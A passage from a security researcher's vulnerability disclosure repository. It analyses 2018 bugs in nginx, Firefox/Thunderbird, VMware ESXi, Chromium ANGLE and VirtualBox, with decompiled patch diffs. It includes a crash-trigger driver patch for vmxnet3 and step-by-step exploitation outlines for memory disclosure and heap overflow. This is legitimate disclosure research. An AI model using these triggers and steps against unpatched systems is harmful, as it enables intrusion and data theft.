data, at least in default configuration. 45 | 46 | Tip on configuration: see the included nginx.conf file /video/ section. 47 | 48 | 49 | References 50 | 51 | [nginx-announce] nginx security advisory (CVE-2018-16845) https://mailman.nginx.org/pipermail/nginx-announce/2018/000221.html?_ga=2.85094233.1343789537.1647791803-1269222961.1647791803 52 | nginx security advisories http://nginx.org/en/security_advisories.html 53 | Zero Day Engineering research http://zerodayengineering.com/research/ 54 | 55 | 56 | Contacts 57 | 58 | Twitter: @alisaesage @zerodaytraining 59 | Email: contact@zerodayengineering.com 60 | -------------------------------------------------------------------------------- /CVE-2018-16845_nginx_mp4/test.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2018-16845_nginx_mp4/test.mp4 -------------------------------------------------------------------------------- /CVE-2018-5144_Firefox_Thunderbird/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2018-5144: Firefox ESR and Thunderbird Integer Overflow Remote Code Execution Vulnerability 4 | 5 | ### Credits 6 | 7 | Vulnerability discovery: Alisa Esage 8 | Vulnerability analysis: Alisa Esage 9 | -------------------------------------------------------------------------------- /CVE-2018-5144_Firefox_Thunderbird/analysis.txt: -------------------------------------------------------------------------------- 1 | CVE-2018-5144: Integer overflow during Unicode conversion 2 | 3 | Overflow in nsUnicodeToBIG5::GetMaxLength can create memory-safety bugs in callers 4 | 5 | nsUnicodeToBIG5::GetMaxLength (/ff-esr52/intl/uconv/ucvtw/nsUnicodeToBIG5.cpp) performs an unchecked integer computation based on the int32 value provided by the caller, and returns the result in the int32 out parameter provided by the caller: 6 | 7 | NS_IMETHODIMP 8 | nsUnicodeToBIG5::GetMaxLength(const char16_t* aSrc, 9 | int32_t aSrcLength, 10 | int32_t* aDestLength) 11 | { 12 | *aDestLength = (aSrcLength * 2) + // <<<<<<<<<<<<<< (0) 13 | (mPendingTrail ? 1 : 0) + 14 | // If the lead ends up being paired, the bytes produced 15 | // are already included above. 16 | // If not, it produces a single '?'. 17 | (mUtf16Lead ? 1 : 0); 18 | return NS_OK; 19 | } 20 | 21 | In case that aSrcLength is 0x7fffffff, or even 0x7ffffffd if the two flags mPendingTrail and mUtf16Lead are set to true, aDestLength will overflow at (0), and a near-zero negative value will be returned to the caller. 22 | 23 | nsUnicodeToBIG5 is a member of nsIUnicodeEncoder family of classes, which provides an abstracted Unicode encoding facility to a variety of callers around the code base, including DOM and Javascript engines, which operate almost entirely on user-controlled data. The various nsUnicodeTo* classes may be invoked via a dispatcher instance of nsIUnicodeEncoder, as follows, for instance: 24 | 25 | nsCOMPtr mEncoder; 26 | mEncoder = EncodingUtils::EncoderForEncoding(charset); // charset value may be obtained from user-controlled data 27 | mEncoder->GetMaxLength(src, src.Length(), ...); 28 | 29 | In case that the charset is set to "big5", nsUnicodeToBIG5::GetMaxLength will be called. 30 | 31 | GetMaxLength is declared as follows in nsIUnicodeEncoder.h: 32 | 33 | /** 34 | * Returns a quick estimation of the size of the buffer needed to hold the 35 | * converted data. Remember: this estimation is >= with the actual size of 36 | * the buffer needed. It will be computed for the "worst case" 37 | * 38 | * @param aSrc [IN] the source data buffer 39 | * @param aSrcLength [IN] the length of source data buffer 40 | * @param aDestLength [OUT] the needed size of the destination buffer 41 | * @return NS_OK_UENC_EXACTLENGTH if an exact length was computed 42 | * NS_ERROR_OUT_OF_MEMORY if OOM 43 | * NS_OK if all we have is an approximation 44 | */ 45 | MOZ_MUST_USE NS_IMETHOD GetMaxLength(const char16_t* aSrc, 46 | int32_t aSrcLength, 47 | int32_t* aDestLength) = 0; 48 | ... 49 | 50 | Note that because GetMaxLength is prototyped as fallible, the callers expect it to signal of any internal failure, and therefore are unlikely to double-check the validity of the returned value. 51 | 52 | The implications of a buffer size estimation procedure returning a negative value are almost certainly security relevant, however the actual impact depends on how exactly the caller uses the returned value. Consider for example, nsScriptableUnicodeConverter::ConvertFromUnicodeWithLength (/ff-esr52/intl/uconv/nsScriptableUConv.cpp): 53 | 54 | nsresult 55 | nsScriptableUnicodeConverter::ConvertFromUnicodeWithLength(const nsAString& aSrc, 56 | int32_t* aOutLen, 57 | char **_retval) 58 | { 59 | if (!mEncoder) 60 | return NS_ERROR_FAILURE; 61 | 62 | nsresult rv = NS_OK; 63 | int32_t inLength = aSrc.Length(); 64 | const nsAFlatString& flatSrc = PromiseFlatString(aSrc); 65 | rv = mEncoder->GetMaxLength(flatSrc.get(), inLength, aOutLen); // <<< (1) 66 | if (NS_SUCCEEDED(rv)) { 67 | *_retval = (char*)malloc(*aOutLen+1); // <<<<<<<<<< (2) 68 | if (!*_retval) 69 | return NS_ERROR_OUT_OF_MEMORY; 70 | 71 | rv = mEncoder->Convert(flatSrc.get(), &inLength, *_retval, aOutLen); // <<<<<<<<<< (3) 72 | if (NS_SUCCEEDED(rv)) 73 | { 74 | (*_retval)[*aOutLen] = '\0'; // <<<<<<<<<<< (4) 75 | return NS_OK; 76 | } 77 | free(*_retval); 78 | } 79 | *_retval = nullptr; 80 | return NS_ERROR_FAILURE; 81 | } 82 | 83 | At (1), GetMaxLength() can return -1 (0xffffffff), which then would be used by malloc at (2) to allocate a buffer of size 0, leading to a heap corruption (i.e. a buffer overflow, or nulling of the trailing byte of the preceding heap chunk) at either (3) or/and (4). 84 | 85 | There are also other places in the code base, where GetMaxLength() is used in a similar fashion. 86 | 87 | The issue was verified with the latest release code of Firefox ESR. 88 | 89 | -------------------------------------------------------------------------------- /CVE-2018-5178_Firefox_Thunderbird/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2018-5178: Firefox ESR and Thunderbird Buffer Overflow Remote Code Execution Vulnerability 4 | 5 | ### Credits 6 | 7 | Vulnerability discovery: Alisa Esage 8 | Vulnerability analysis: Alisa Esage 9 | -------------------------------------------------------------------------------- /CVE-2018-5178_Firefox_Thunderbird/analysis.txt: -------------------------------------------------------------------------------- 1 | CVE-2018-5178: Buffer overflow during UTF-8 to Unicode string conversion through legacy extension 2 | 3 | Integer overflow in nsScriptableUnicodeConverter::ConvertFromByteArray can cause a heap buffer overflow 4 | 5 | I. The bug 6 | 7 | In nsScriptableUnicodeConverter::ConvertFromByteArray (ff-esr52/intl/uconv/nsScriptableUConv.cpp), the malloc() size argument on line 148 is computed from an unbounded integer value, which can overflow: 8 | 9 | 134:nsScriptableUnicodeConverter::ConvertFromByteArray(const uint8_t* aData, 10 | 135: uint32_t aCount, 11 | 136: nsAString& _retval) 12 | 137:{ 13 | 138: if (!mDecoder) 14 | 139: return NS_ERROR_FAILURE; 15 | 140: 16 | 141: nsresult rv = NS_OK; 17 | 142: int32_t inLength = aCount; 18 | 143: int32_t outLength; 19 | 144: rv = mDecoder->GetMaxLength(reinterpret_cast(aData), 20 | 145: inLength, &outLength); 21 | 146: if (NS_SUCCEEDED(rv)) 22 | 147: { 23 | 148: char16_t* buf = (char16_t*)malloc((outLength+1) * sizeof(char16_t)); 24 | 149: if (!buf) 25 | 150: return NS_ERROR_OUT_OF_MEMORY; 26 | 151: 27 | 152: rv = mDecoder->Convert(reinterpret_cast(aData), 28 | 153: &inLength, buf, &outLength); 29 | 154: if (NS_SUCCEEDED(rv)) 30 | 155: { 31 | 156: buf[outLength] = 0; 32 | 157: if (!_retval.Assign(buf, outLength, mozilla::fallible)) { 33 | 158: rv = NS_ERROR_OUT_OF_MEMORY; 34 | 159: } 35 | 160: } 36 | 161: free(buf); 37 | 162: return rv; 38 | 163: } 39 | 164: return NS_ERROR_FAILURE; 40 | 165: 41 | 166:} 42 | 43 | The outLength value is provided by GetMaxLength() (line 144), which is a member of nsIUnicodeDecoder class, and represented by nsUTF8ToUnicode::GetMaxLength in this case (see bug#1440926 for some background analysis of this family of classes). It is computed as the length of aData passed from the caller, plus 1. 44 | 45 | Consider for instance, that the length of aData is INT32_MAX-1. Then outLength will be INT32_MAX and will overflow on the addition operation (line 148), and become -2147483648. Then the multiplication operation by 2 (sizeof(char16_t)) will overflow it again, and the result will be truncated to zero and passed as an argument to malloc(). 46 | 47 | Here is an output of a simple test program written in C and compiled with Clang (Apple LLVM version 8.0.0 (clang-800.0.42.1)), which demostrates the effect of the unchecked integer arithmetic in this code: 48 | 49 | $ ./a.out 50 | INT32_MAX + 1 = -2147483648 (0x80000000) 51 | (INT32_MAX + 1) * 2 = 0 (0x0) 52 | 53 | Next, nsUTF8ToUnicode::Convert() on line 152 will populate the zero-sized buffer with unicode data derived from aData, using the original value of outLength (which is still INT32_MAX) as the bound. That will lead to overwrite of unowned memory which immediately follows the buffer, with caller-controlled data. 54 | 55 | II. Reachability analysis 56 | 57 | The only place where nsScriptableUnicodeConverter::ConvertFromByteArray is used in core code is nsScriptableUnicodeConverter::ConvertToUnicode. Both functions are directly exposed to privileged Javascript in Firefox. Therefore, I have identified 3 possible attack vectors: 58 | 59 | 1. Via a malicious extension 60 | 61 | Privileged Javascript can obtain an instance of nsScriptableUnicodeConverter via Components.classes class factory, as such: 62 | 63 | var converter = Components.classes["@mozilla.org/intl/scriptableunicodeconverter"] 64 | .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); 65 | 66 | And then call the ConvertToUnicode/ConvertFromByteArray functions directly with an arbitrary String or a TypedArray. 67 | 68 | https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIScriptableUnicodeConverter 69 | 70 | 2. (1) implies that all Firefox installations which have installed an legitimate extension which uses nsIScriptableUnicodeConverter are affected. 71 | 72 | The specific attack vector in this case depends on how the extension uses the class, however it's likely to operate on user-controlled data. (See bug#289947 for example of such an extension and the user-controlled data which it processed) 73 | 74 | 3. There is a number of places in the components of Firefox written in Javascript, which instantiate and use nsScriptableUnicodeConverter for their own purposes. 75 | Notably devtools, password manager, settings, and import of bookmarks: 76 | 77 | nsScriptableUnicodeConverter::ConvertToUnicode: 78 | ./browser/base/content/test/urlbar/browser_urlbarCopying.js:12: return converter.ConvertToUnicode(input); 79 | ./devtools/client/debugger/content/views/sources-view.js:307: unicodeUrl = NetworkHelper.convertToUnicode(unescape(fullUrl)); 80 | ./devtools/client/debugger/content/views/sources-view.js:638: return NetworkHelper.convertToUnicode(unescape(source.url)); 81 | ./devtools/client/debugger/utils.js:149: let unicodeLabel = NetworkHelper.convertToUnicode(unescape(sourceLabel)); 82 | ./devtools/client/debugger/utils.js:185: let unicodeLabel = NetworkHelper.convertToUnicode(unescape(groupLabel)); 83 | ./devtools/client/netmonitor/netmonitor-view.js:556: let unicodeUrl = NetworkHelper.convertToUnicode(unescape(data.url)); 84 | ./devtools/client/netmonitor/request-utils.js:136: let name = NetworkHelper.convertToUnicode( 85 | ./devtools/client/netmonitor/request-utils.js:138: let query = NetworkHelper.convertToUnicode(unescape(url.query)); 86 | ./devtools/client/netmonitor/request-utils.js:147: return NetworkHelper.convertToUnicode(unescape(url.hostPort)); 87 | ./devtools/client/netmonitor/requests-menu-view.js:970: let unicodeUrl = NetworkHelper.convertToUnicode(unescape(uri.spec)); 88 | ./devtools/client/netmonitor/test/head.js:264: let unicodeUrl = NetworkHelper.convertToUnicode(unescape(aUrl)); 89 | ./devtools/client/netmonitor/test/head.js:265: let name = NetworkHelper.convertToUnicode(unescape(uri.fileName || uri.filePath || "/")); 90 | ./devtools/client/netmonitor/test/head.js:266: let query = NetworkHelper.convertToUnicode(unescape(uri.query)); 91 | ./devtools/client/scratchpad/scratchpad.js:1126: content = converter.ConvertToUnicode(aContent); 92 | ./devtools/server/actors/settings.js:35: let rawstr = converter.ConvertToUnicode(NetUtil.readInputStreamToString( 93 | ./devtools/shared/DevToolsUtils.js:472: // the guess is wrong, the conversion fails and convertToUnicode returns 94 | ./devtools/shared/DevToolsUtils.js:477: let unicodeSource = NetworkHelper.convertToUnicode(source, charset); 95 | ./devtools/shared/transport/packets.js:165: json = unicodeConverter.ConvertToUnicode(json); 96 | ./devtools/shared/webconsole/network-helper.js:87: convertToUnicode: function (text, charset) { 97 | ./devtools/shared/webconsole/network-helper.js:92: return conv.ConvertToUnicode(text); 98 | ./devtools/shared/webconsole/network-helper.js:110: return this.convertToUnicode(text, charset); 99 | ./devtools/shared/webconsole/network-helper.js:789: NetworkHelper.convertToUnicode(unescape(param[0])) : "", 100 | ./devtools/shared/webconsole/network-helper.js:791: NetworkHelper.convertToUnicode(unescape(param[1])) : "" 101 | ./devtools/shared/webconsole/network-monitor.js:411: NetworkHelper.convertToUnicode(data, request.contentCharset); 102 | ./dom/apps/AppsUtils.jsm:657: let data = JSON.parse(converter.ConvertToUnicode(NetUtil.readInputStreamToString(aStream, 103 | ./dom/settings/SettingsDB.jsm:91: let rawstr = converter.ConvertToUnicode(NetUtil.readInputStreamToString( 104 | ./services/common/utils.js:196: str = this._utf8Converter.ConvertToUnicode(str); 105 | ./toolkit/components/passwordmgr/crypto-SDR.js:130: plainText = this._utfConverter.ConvertToUnicode(plainOctet); 106 | ./toolkit/components/telemetry/tests/unit/head.js:144: let utf8string = unicodeConverter.ConvertToUnicode(observer.buffer); 107 | ./toolkit/identity/tests/unit/test_crypto_service.js:107: let result = utf8Converter.ConvertToUnicode(base64UrlDecode(target)); 108 | 109 | nsScriptableUnicodeConverter::ConvertFromByteArray: 110 | ./toolkit/components/places/BookmarkJSONUtils.jsm:203: let jsonString = converter.convertFromByteArray(aResult, 111 | ./toolkit/components/places/BookmarkJSONUtils.jsm:240: let jsonString = converter.convertFromByteArray(aResult, aResult.length); 112 | ./toolkit/components/places/tests/bookmarks/test_1016953-renaming-uncompressed.js:38: let jsonString = converter.convertFromByteArray(result, result.length); 113 | ./toolkit/components/places/tests/bookmarks/test_1016953-renaming-uncompressed.js:68: let jsonString = converter.convertFromByteArray(result, result.length); 114 | 115 | For example, BookmarkJSONUtils.jsm calls convertFromByteArray while importing bookmarks, with the data obtained from either a compressed file or an URL, which can be provided by an attacker. 116 | 117 | III. Exploitability 118 | 119 | With an arbitrary heap overflow and some prior heap grooming, it's possible to overwrite metadata of some object (a storage slot of an Array, for example) and thereby obtain an arbitrary read-write exploitation primitive, which can be leveraged into both an info-leak and arbitrary code execution. 120 | 121 | The bug was confirmed with the latest release source code of Firefox ESR. 122 | -------------------------------------------------------------------------------- /CVE-2018-6981_VMWare_ESXi/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2018-6981: VMWare ESXi and Workstation Uninitialized Variable RCE 4 | 5 | This vulnerability was leveraged to win the GeekPwn2018 competition. I re-discovered it by analysing the security patch, and made a proof of concept. 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: Zhangyanyu 10 | Vulnerability analysis: Alisa Esage 11 | Proof of concept: Alisa Esage 12 | -------------------------------------------------------------------------------- /CVE-2018-6981_VMWare_ESXi/analysis.txt: -------------------------------------------------------------------------------- 1 | 01.07.2019. Research Note: Patch diff vmxnet3 bug from GeekPwn2018 2 | 3 | VMSA-2018-0027 reports two bugs from GeekPwn: CVE-2018-6981 (RCE) and CVE-2018-6981 (infoleak). The latter affects only ESXi. Both bugs are d.t. uninitialized variable usage. 4 | 5 | Patch diff - culprit basic block with added code: 6 | 7 | sub_140193260 proc near 8 | // skip ... 9 | loc_140193398: 10 | mov rax, [rbx+0D0h] 11 | lea rdx, [rsp+0A8h+var_78] 12 | mov rcx, [rbx+128h] 13 | mov r8d, 1 14 | mov [rsp+0A8h+var_88], rdx 15 | add rcx, 8; Dst 16 | mov edx, 2B0h 17 | mov r9d, [rax+0B8h] 18 | call sub_140447AE0 19 | // -- patch starts here -- below code is not present in the vulnerable binary 20 | test al, al 21 | jnz short loc_1401933E0 22 | loc_1401933cf: 23 | lea rcx, aVmxnet3UserCou; "VMXNET3 user: Could not read DSDevRead"... 24 | call sub_14046F430 25 | jmp loc_1401935C5; jumptable 00000001401932D7 default case 26 | // -- end of patch -- 27 | loc_1401933e0: 28 | lea rdx, [rsp+0A8h+var_78] 29 | mov rcx, rbx 30 | call sub_140193790 31 | lea rcx, [rsp+0A8h+var_78] 32 | call sub_140447470 33 | mov rcx, rbx 34 | call sub_140202400 35 | jmp loc_1401935C5; jumptable 00000001401932D7 default case 36 | // skip ... 37 | 38 | sub_140193260 procedure is responsible for handling of GET and SET commands sent to the adapter by the guest VM via writing to the physical memory of the BAR1 register. In vmxnet3_drv.c it's called like: VMXNET3_WRITE_BAR1_REG(adapter, VMXNET3_REG_CMD, VMXNET3_CMD_*). 39 | 40 | The specific case which is patched (loc_140193398) is responsible for handling of the SET command with the magic value 0xCAFE0004 of the VMXNET3_REG_CMD offset of the BAR1 register. It's not clear which command is this, as the number of cases in the binary switch does not corresponds to the number of magics in the guest driver source code, indicating possible version mismatch. If the numeric value is correct, then it should be VMXNET3_CMD_UPDATE_MAC_FILTERS. 41 | 42 | What happens here is the guest VM sends a particular SET command to the vmxnet3 adapter by writing the magic value 0xCAFE0004 to BAR1 register VMXNET3_REG_CMD. As the host code receives the changed register value, it calls "sub_140447AE0" (read_DSDevRead* for later reference), passing the stack variable var_78 as an argument. In case that read_DSDevRead fails (that was unchecked in the vulnerable binary), the variable remains uninitialized and passed to sub_140193790 and sub_140447470, where the actual memory corruption presumably happens. 43 | 44 | The code inside of read_DSDevRead is patched too: a memset on the stack variable argument is added in case of a failure, which confirms the above assessment: 45 | 46 | Vulnerable sub_140447AE0 / read_DSDevRead: 47 | char __fastcall read_DSDevRead_vuln(unsigned __int64 a1, unsigned __int64 a2, unsigned int a3, unsigned int a4, __int64 culprit) 48 | { 49 | unsigned __int64 v5; // r10 50 | 51 | v5 = *(_QWORD *)(qword_140DA45A8 + 19776); 52 | if ( (a1 > v5 || !a2 || a2 > v5 - a1 + 1) && !_bittest((const signed int *)&a3, 0xDu) ) 53 | return 0; 54 | sub_140445DF0(a1, a2, a3, a4, culprit); 55 | return 1; 56 | } 57 | 58 | Patched: 59 | char __fastcall read_DSDevRead_patched(void *Dst, unsigned __int64 a2, unsigned int a3, unsigned int a4, void *culprit) 60 | { 61 | unsigned __int64 v5; // r10 62 | char result; // al 63 | 64 | v5 = *(_QWORD *)(qword_140DA45A8 + 0x4D40); 65 | if ( (unsigned __int64)Dst <= v5 && a2 && a2 <= v5 - (unsigned __int64)Dst + 1 66 | || _bittest((const signed int *)&a3, 0xDu) ) 67 | { 68 | sub_140445B50((unsigned __int64)Dst, a2, a3, a4, (__int64)culprit); 69 | result = 1; 70 | } 71 | else 72 | { 73 | memset(culprit, 0, 0x60ui64); 74 | result = 0; 75 | } 76 | return result; 77 | } 78 | 79 | DSDevRead is the name of a sub-structure within vmxnet_drv's shared memory structure, defined as follows: 80 | 81 | struct Vmxnet3_DriverShared { 82 | __le32 magic; 83 | /* make devRead start at 64bit boundaries */ 84 | __le32 pad; 85 | struct Vmxnet3_DSDevRead devRead; 86 | __le32 ecr; 87 | __le32 reserved; 88 | union { 89 | __le32 reserved1[4]; 90 | union Vmxnet3_CmdInfo cmdInfo; /* only valid in the context of 91 | * executing the relevant 92 | * command 93 | */ 94 | } cu; 95 | }; 96 | 97 | struct Vmxnet3_DSDevRead { 98 | /* read-only region for device, read by dev in response to a SET cmd */ 99 | struct Vmxnet3_MiscConf misc; 100 | struct Vmxnet3_IntrConf intrConf; 101 | struct Vmxnet3_RxFilterConf rxFilterConf; 102 | struct Vmxnet3_VariableLenConfDesc rssConfDesc; 103 | struct Vmxnet3_VariableLenConfDesc pmConfDesc; 104 | struct Vmxnet3_VariableLenConfDesc pluginConfDesc; 105 | }; 106 | 107 | So, the host code tries to read physical memory of Vmxnet3_DSDevRead in responce to the SET command, but the reading operation fails => uninitialized variable is used. -------------------------------------------------------------------------------- /CVE-2018-6981_VMWare_ESXi/screens/patch_analysis/DSDevRead_patched.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2018-6981_VMWare_ESXi/screens/patch_analysis/DSDevRead_patched.png -------------------------------------------------------------------------------- /CVE-2018-6981_VMWare_ESXi/screens/patch_analysis/DSDevRead_vuln.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2018-6981_VMWare_ESXi/screens/patch_analysis/DSDevRead_vuln.png -------------------------------------------------------------------------------- /CVE-2018-6981_VMWare_ESXi/screens/patch_analysis/patch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2018-6981_VMWare_ESXi/screens/patch_analysis/patch.png -------------------------------------------------------------------------------- /CVE-2018-6981_VMWare_ESXi/screens/patch_analysis/patched_code.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2018-6981_VMWare_ESXi/screens/patch_analysis/patched_code.png -------------------------------------------------------------------------------- /CVE-2018-6981_VMWare_ESXi/screens/repro_screens/vmxnet3_av.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2018-6981_VMWare_ESXi/screens/repro_screens/vmxnet3_av.png -------------------------------------------------------------------------------- /CVE-2018-6981_VMWare_ESXi/screens/repro_screens/vmxnet3_log.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2018-6981_VMWare_ESXi/screens/repro_screens/vmxnet3_log.png -------------------------------------------------------------------------------- /CVE-2018-6981_VMWare_ESXi/screens/repro_screens/vmxnet3_uninit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2018-6981_VMWare_ESXi/screens/repro_screens/vmxnet3_uninit.png -------------------------------------------------------------------------------- /CVE-2018-6981_VMWare_ESXi/testcase/testcase_crash.patch: -------------------------------------------------------------------------------- 1 | diff --git a/vmxnet3/vmxnet3_drv.c b/vmxnet3/vmxnet3_drv.c 2 | index cf95290..99b5a02 100644 3 | --- a/vmxnet3/vmxnet3_drv.c 4 | +++ b/vmxnet3/vmxnet3_drv.c 5 | @@ -2562,6 +2562,14 @@ vmxnet3_activate_dev(struct vmxnet3_adapter *adapter) 6 | VMXNET3_WRITE_BAR1_REG(adapter, VMXNET3_REG_CMD, 7 | VMXNET3_CMD_ACTIVATE_DEV); 8 | ret = VMXNET3_READ_BAR1_REG(adapter, VMXNET3_REG_CMD); 9 | + 10 | + pr_info("vmxnet3_activate_dev malice"); 11 | + VMXNET3_WRITE_BAR1_REG(adapter, VMXNET3_REG_DSAL, 0xAAAAAAAA); 12 | + VMXNET3_WRITE_BAR1_REG(adapter, VMXNET3_REG_DSAH, 0xAAAAAAAA); 13 | + 14 | + VMXNET3_WRITE_BAR1_REG(adapter, VMXNET3_REG_CMD, 15 | + VMXNET3_CMD_UPDATE_MAC_FILTERS); 16 | + 17 | spin_unlock_irqrestore(&adapter->cmd_lock, flags); 18 | 19 | if (ret != 0) { 20 | -------------------------------------------------------------------------------- /CVE-2018-FFFF_Chrome/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2018-FFFF: Chromium ANGLE Uninitialized Variable RCE 4 | 5 | Likely exploitable, although restricted in relevance, as it applies only to a subset of systems with specific graphics hardware. 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: Alisa Esage 10 | Vulnerability analysis: Alisa Esage 11 | -------------------------------------------------------------------------------- /CVE-2018-FFFF_Chrome/analysis.txt: -------------------------------------------------------------------------------- 1 | Chromium ANGLE uninitialized variable vulnerability 2 | 3 | VULNERABILITY DETAILS 4 | 5 | Blit11::copyAndConvert(/src/libANGLE/renderer/d3d/d3d11/Blit11.cpp) does not check the return value of ID3D11DeviceContext::Map, when it's called on a system which has Nvidia drivers below a certain version installed: 6 | 7 | 1515: gl::Error Blit11::copyAndConvert 8 | ... 9 | 1530:{ 10 | 1531: ANGLE_TRY(initResources()); 11 | 1532: 12 | 1533: ID3D11DeviceContext *deviceContext = mRenderer->getDeviceContext(); 13 | ... 14 | 1550: // Work around timeouts/TDRs in older NVIDIA drivers. 15 | 1551: if (mRenderer->getWorkarounds().depthStencilBlitExtraCopy) 16 | 1552: { 17 | 1553: D3D11_MAPPED_SUBRESOURCE mapped; 18 | 1554: deviceContext->Map(destStaging.get(), 0, D3D11_MAP_READ, 0, &mapped); 19 | 1555: deviceContext->UpdateSubresource(dest.get(), destSubresource, nullptr, mapped.pData, 20 | 1556: mapped.RowPitch, mapped.DepthPitch); 21 | 1557: deviceContext->Unmap(destStaging.get(), 0); 22 | 1558: } 23 | ... 24 | 1565: return gl::NoError(); 25 | 1566:} 26 | 27 | On line 1554, ID3D11DeviceContext::Map is called, and the call is expected to assign a value to the `mapped` local variable. However, Map can fail in certain circumstances, as per the documentation (https://msdn.microsoft.com/en-us/library/windows/desktop/ff476457(v=vs.85).aspx). In practice it is known to fail on the OOM condition (https://community.amd.com/thread/128535), which may be specifically induced by the attacker. In case that the Map call fails, then ID3D11DeviceContext::UpdateSubresource will be called (line 1555), that will copy whatever data is pointed to by the random content of the uninitialized variable `mapped` to the output buffer provided by the caller. 28 | 29 | Reachability analysis: 30 | 31 | There are multiple code paths which result in calling the vulnerable function. Consider the following call chain, for example: 32 | 33 | (JavaScript WebGL2 context) -> 34 | Context::blitFramebuffer -> 35 | Framebuffer::blit -> 36 | FramebufferD3D::blit -> 37 | Framebuffer11::blitImpl -> 38 | Renderer11::blitRenderbufferRect -> 39 | Blit11::copyStencil -> 40 | Blit11::copyDepthStencilImpl -> 41 | Blit11::copyAndConvert. 42 | 43 | The vulnerable function Blit11::copyAndConvert is reachable via the blitFramebuffer Javascript function of the WebGL2 context. In case that the vulnerability is triggered, ID3D11DeviceContext::UpdateSubresource will copy data from a random pointer (as it's provided by the random contents of the uninitialized variable `mapped`) to the destination rectangle provided in the arguments to blitFramebuffer. The pixels of the displayed rectangle can then be read back by the attacker via canvas.getImageData (https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/getImageData), thereby resulting in memory disclosure. 44 | 45 | Exploitation: 46 | 47 | 1. groom the stack in order to cause a meaningful memory pointer appearing in the `mapped` variable, while it's still uninitialized (via leftowers from previous stack operations) 48 | 2. cause an OOM, or otherwise induce a fallible condition to ID3D11DeviceContext::UpdateSubresource 49 | 3. call WebGL2's blitFramebuffer (within an initialized WebGL2 context, etc.) 50 | 4. draw the leaked buffer on the screen 51 | 5. read the drawn pixels back via canvas.getImageData, which represent memory bytes 52 | 6. use the obtained memory data (which may contain pointers to executable modules or some sensitive data) to bypass ASLR, or to read user's passwords, for example. 53 | 54 | 55 | VERSION 56 | The issue was verified in the latest trunk code of ANGLE. 57 | 58 | 59 | REPRODUCTION CASE 60 | I don't have a repro, since it requires very specific conditions to trigger. Specifically, the vulnerable path of the code will be triggered, if the system has Nvidia drivers, and the drivers version is below 13.6881, as per GenerateWorkarounds() (/src/libANGLE/renderer/d3d/d3d11/renderer11_utils.cpp). -------------------------------------------------------------------------------- /CVE-2018-XXXX_VirtualBox/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2018-XXXX: VirtualBox 3D Virtualization Memory Corruption Elevation of Privilege Vulnerability (multiple) 4 | 5 | Just a few out of a few dozens of security bugs that I found in VirtualBox 3D component. These ones were rejected by the Zero Day Initiative due to a bug collision with another researcher. 6 | 7 | Testing: the ZDI has published a proof of concept template for this bug class in their blog. 8 | 9 | ### Credits 10 | 11 | Vulnerability discovery: Alisa Esage 12 | Vulnerability analysis: Alisa Esage 13 | Proof of concept: Alisa Esage -------------------------------------------------------------------------------- /CVE-2018-XXXX_VirtualBox/crServerDispatchGenProgramsARB/analysis.txt: -------------------------------------------------------------------------------- 1 | Buffer overflow and infoleak in Oracle VirtualBox crServerDispatchGenProgramsARB 2 | 3 | Testing: VirtualBox v5.2.12 x64 4 | VM: Windows 7 x64 5 | Host OS: Windows 10 x64, April 2018 6 | 7 | 8 | There is an integer overflow in the VirtualBox Chromium function crServerDispatchGenProgramsARB in the processing of the CR_GENPROGRAMSARB_EXTEND_OPCODE (/VirtualBox-5.2.12/src/VBox/HostServices/SharedOpenGL/crserverlib/server_gentextures.c): 9 | 10 | void SERVER_DISPATCH_APIENTRY crServerDispatchGenProgramsARB( GLsizei n, GLuint * ids ) 11 | { 12 | GLuint *local_progs = (GLuint *) crAlloc( n*sizeof( *local_progs) ); // <———— (0) integer overflow 13 | GLsizei i; 14 | (void) ids; 15 | cr_server.head_spu->dispatch_table.GenProgramsARB( n, local_progs ); // <———— (1) out of bounds access 16 | 17 | /* see comments in crServerDispatchGenTextures */ 18 | for (i=0; idispatch_table.GenProgramsARB(1, &tID); 24 | local_progs[i] = tID; // <———— (3) out of bounds write 25 | tID = crServerTranslateProgramID(tID); 26 | } 27 | } 28 | 29 | crServerReturnValue( local_progs, n*sizeof( *local_progs ) ); // <———— (4) send the leaked data to VM 30 | crFree( local_progs ); 31 | } 32 | 33 | At line (0), integer overflow can happen, if the `n` variable (provided by the VM) is in the range 0x40000000..0xffffffff. In such case the local_progs buffer allocated by crAlloc will be too small to hold `n` instances of GLuint. Further in the code, at lines (1)-(3), out-of-bounds reads and writes can happen (depending on exact values of `n` versus the size of the `local_progs` buffer). At line (4), the contents of the local_progs buffer is sent back to the VM. Thus it’s possible to leak some entropy and escalate privileges from VM to Host. 34 | 35 | 36 | See also: 37 | crash.png - screenshot of a write a/v 38 | VBox.log - crash log from VirtualBox VM 39 | 